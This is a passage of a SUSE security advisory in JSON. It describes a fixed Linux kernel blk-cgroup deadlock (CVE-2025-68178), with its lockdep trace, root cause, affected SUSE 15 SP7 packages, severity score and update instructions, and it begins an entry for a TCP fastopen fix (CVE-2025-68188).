{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblk-cgroup: fix possible deadlock while configuring policy\n\nFollowing deadlock can be triggered easily by lockdep:\n\nWARNING: possible circular locking dependency detected\n6.17.0-rc3-00124-ga12c2658ced0 #1665 Not tainted\n------------------------------------------------------\ncheck/1334 is trying to acquire lock:\nff1100011d9d0678 (\u0026q-\u003esysfs_lock){+.+.}-{4:4}, at: blk_unregister_queue+0x53/0x180\n\nbut task is already holding lock:\nff1100011d9d00e0 (\u0026q-\u003eq_usage_counter(queue)#3){++++}-{0:0}, at: del_gendisk+0xba/0x110\n\nwhich lock already depends on the new lock.\n\nthe existing dependency chain (in reverse order) is:\n\n-\u003e #2 (\u0026q-\u003eq_usage_counter(queue)#3){++++}-{0:0}:\n blk_queue_enter+0x40b/0x470\n blkg_conf_prep+0x7b/0x3c0\n tg_set_limit+0x10a/0x3e0\n cgroup_file_write+0xc6/0x420\n kernfs_fop_write_iter+0x189/0x280\n vfs_write+0x256/0x490\n ksys_write+0x83/0x190\n __x64_sys_write+0x21/0x30\n x64_sys_call+0x4608/0x4630\n do_syscall_64+0xdb/0x6b0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n-\u003e #1 (\u0026q-\u003erq_qos_mutex){+.+.}-{4:4}:\n __mutex_lock+0xd8/0xf50\n mutex_lock_nested+0x2b/0x40\n wbt_init+0x17e/0x280\n wbt_enable_default+0xe9/0x140\n blk_register_queue+0x1da/0x2e0\n __add_disk+0x38c/0x5d0\n add_disk_fwnode+0x89/0x250\n device_add_disk+0x18/0x30\n virtblk_probe+0x13a3/0x1800\n virtio_dev_probe+0x389/0x610\n really_probe+0x136/0x620\n __driver_probe_device+0xb3/0x230\n driver_probe_device+0x2f/0xe0\n __driver_attach+0x158/0x250\n bus_for_each_dev+0xa9/0x130\n driver_attach+0x26/0x40\n bus_add_driver+0x178/0x3d0\n driver_register+0x7d/0x1c0\n __register_virtio_driver+0x2c/0x60\n virtio_blk_init+0x6f/0xe0\n do_one_initcall+0x94/0x540\n kernel_init_freeable+0x56a/0x7b0\n kernel_init+0x2b/0x270\n ret_from_fork+0x268/0x4c0\n ret_from_fork_asm+0x1a/0x30\n\n-\u003e #0 (\u0026q-\u003esysfs_lock){+.+.}-{4:4}:\n __lock_acquire+0x1835/0x2940\n lock_acquire+0xf9/0x450\n __mutex_lock+0xd8/0xf50\n mutex_lock_nested+0x2b/0x40\n blk_unregister_queue+0x53/0x180\n __del_gendisk+0x226/0x690\n del_gendisk+0xba/0x110\n sd_remove+0x49/0xb0 [sd_mod]\n device_remove+0x87/0xb0\n device_release_driver_internal+0x11e/0x230\n device_release_driver+0x1a/0x30\n bus_remove_device+0x14d/0x220\n device_del+0x1e1/0x5a0\n __scsi_remove_device+0x1ff/0x2f0\n scsi_remove_device+0x37/0x60\n sdev_store_delete+0x77/0x100\n dev_attr_store+0x1f/0x40\n sysfs_kf_write+0x65/0x90\n kernfs_fop_write_iter+0x189/0x280\n vfs_write+0x256/0x490\n ksys_write+0x83/0x190\n __x64_sys_write+0x21/0x30\n x64_sys_call+0x4608/0x4630\n do_syscall_64+0xdb/0x6b0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nother info that might help us debug this:\n\nChain exists of:\n \u0026q-\u003esysfs_lock --\u003e \u0026q-\u003erq_qos_mutex --\u003e \u0026q-\u003eq_usage_counter(queue)#3\n\n Possible unsafe locking scenario:\n\n CPU0 CPU1\n ---- ----\n lock(\u0026q-\u003eq_usage_counter(queue)#3);\n lock(\u0026q-\u003erq_qos_mutex);\n lock(\u0026q-\u003eq_usage_counter(queue)#3);\n lock(\u0026q-\u003esysfs_lock);\n\nRoot cause is that queue_usage_counter is grabbed with rq_qos_mutex\nheld in blkg_conf_prep(), while queue should be freezed before\nrq_qos_mutex from other context.\n\nThe blk_queue_enter() from blkg_conf_prep() is used to protect against\npolicy deactivation, which is already protected with blkcg_mutex, hence\nconvert blk_queue_enter() to blkcg_mutex to fix this problem. Meanwhile,\nconsider that blkcg_mutex is held after queue is freezed from policy\ndeactivation, also convert blkg_alloc() to use GFP_NOIO.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68178",
"url": "https://www.suse.com/security/cve/CVE-2025-68178"
},
{
"category": "external",
"summary": "SUSE Bug 1255266 for CVE-2025-68178",
"url": "https://bugzilla.suse.com/1255266"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-68178"
},
{
"cve": "CVE-2025-68188",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68188"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp: use dst_dev_rcu() in tcp_fastopen_active_disable_ofo_check()\n\nUse RCU to avoid a pair of atomic operations and a potential\nUAF on dst_dev()-\u003eflags.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
